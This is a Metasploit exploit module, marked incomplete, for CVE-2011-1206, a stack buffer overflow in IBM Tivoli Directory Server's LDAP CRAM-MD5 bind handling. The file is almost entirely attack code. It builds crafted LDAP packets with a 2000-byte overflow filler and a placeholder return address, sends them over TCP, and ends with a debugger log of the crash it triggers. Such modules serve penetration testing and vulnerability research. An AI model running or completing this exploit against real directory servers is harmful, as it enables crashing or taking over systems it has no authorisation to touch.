##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info={})
		super(update_info(info,
			'Name'           => "[INCOMPLETE] IBM Tivoli Directory Server SASL Bind Request Vulnerability",
			'Description'    => %q{
=begin
					The specific flaw exists in how ibmslapd.exe handles LDAP CRAM-MD5 packets. ibmslapd.exe
				listens by default on port TCP 389. When the process receives an LDAP CRAM-MD5 packet, it
				uses libibmldap.dll to handle the allocation of a buffer for the packet data. A specially
				crafted packet can cause the ber_get_int function to allocate a buffer that is too small to
				fit the packet data, causing a subsequent stack-based buffer overflow.
=end
			},
			'License'        => MSF_LICENSE,
			'Version'        => "$Revision$",
			'Author'         =>
				[
					'Francis Provencher',  #Initial discovery, poc
					'sinn3r',              #Metasploit
				],
			'References'     =>
				[
					[ 'CVE', '2011-1206' ],
					[ 'URL', 'http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=26&Itemid' ],
					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-136/' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/17188/' ],
				],
			'Payload'        =>
				{
					'BadChars' => "\x00",
				},
			'DefaultOptions'  =>
				{
					'ExitFunction' => "process",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					#IBM Tivoli Dir Server only suuports XP SP3/Win2k3 SP2/or newer
					[ 'Windows Server 2003 SP2', {'Ret'=>0x41414141} ],
				],
			'Privileged'     => false,
			'DisclosureDate' => "Apr 18 2011",
			'DefaultTarget'  => 0))

			register_options(
				[
					Opt::RPORT(1389)
				], self.class
			)
	end

	def exploit
		sploit = "\x41"*2000
		
		packets = {
			:AUTH      => "\x30\x18\x02\x01\x01\x60\x13\x02\x01\x03\x04\x00\xA3\x0C\x04\x08\x43" <<
			              "\x52\x41\x4D\x2D\x4D\x44\x35\x04\x00",
			:CRAM_MD5  => "\x30\x82\x01\x41\x02\x01\x02\x60\x82\x01\x3A\x02\x01\x03\x04\x00\xA3" <<
			              "\x82\x01\x31\x04\x08\x43\x52\x41\x4D\x2D\x4D\x44\x35\x04\x84\xFF\xFF\xFF\xFF" <<
			              sploit <<
			              "\x20\x36\x61\x37\x61\x31\x31\x34\x39\x36\x30\x33\x61\x64\x37\x64\x30" <<
			              "\x33\x34\x39\x35\x66\x39\x65\x37\x31\x34\x66\x34\x30\x66\x31\x63",
		}

		connect

		sock.put(packets[:AUTH])
		sock.get_once
		sock.put(packets[:CRAM_MD5])

		handler
		disconnect
	end
end


=begin
0:005> g
Breakpoint 0 hit
eax=41414141 ebx=7c342151 ecx=00000000 edx=00eb0fa4 esi=03740098 edi=03780060
eip=005b86d6 esp=03d7fd10 ebp=00a597f8 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
libibmldap!ber_bvecfree+0x26:
005b86d6 ffd3            call    ebx {MSVCR71!free (7c342151)}
0:005> g
Breakpoint 1 hit
eax=00000000 ebx=7c342151 ecx=00000000 edx=00eb0fa4 esi=41414141 edi=03780060
eip=0a90ae57 esp=03d7fd04 ebp=00a597f8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
SHSMP!shi_AfxFreeMemoryDebug+0x17:
0a90ae57 e8346bffff      call    SHSMP!MemFreePtr (0a901990)
0:005> g
(7f4.4c8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=7c342151 ecx=00000000 edx=00eb0fa4 esi=41414141 edi=41410000
eip=0a9019a0 esp=03d7fcf8 ebp=41414141 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
SHSMP!MemFreePtr+0x10:
0a9019a0 668b471c        mov     ax,word ptr [edi+1Ch]    ds:0023:4141001c=????
0:005> k
ChildEBP RetAddr  
WARNING: Stack unwind information not available. Following frames may be wrong.
03d7fcfc 0a90ae5c SHSMP!MemFreePtr+0x10
03d7fd08 005b86d8 SHSMP!shi_AfxFreeMemoryDebug+0x1c
03d7fd1c 004098c8 libibmldap!ber_bvecfree+0x28
03d7fd38 0040cf07 ibmslapd!RefObject::add+0x8268
00000000 00000000 ibmslapd!RefObject::add+0xb8a7
0:005> !exchain
03d7fd30: ibmslapd!RefObject::add+73ada (0047513a)
03d7fe70: ibmslapd!RefObject::add+73d83 (004753e3)
03d7ff2c: ibmslapd!RefObject::add+7504c (004766ac)
ldap_ph!pthread_cond_wait+a00 (003f5750)
...
libibm_2.ber_get_int @ 0x005B80F0
=end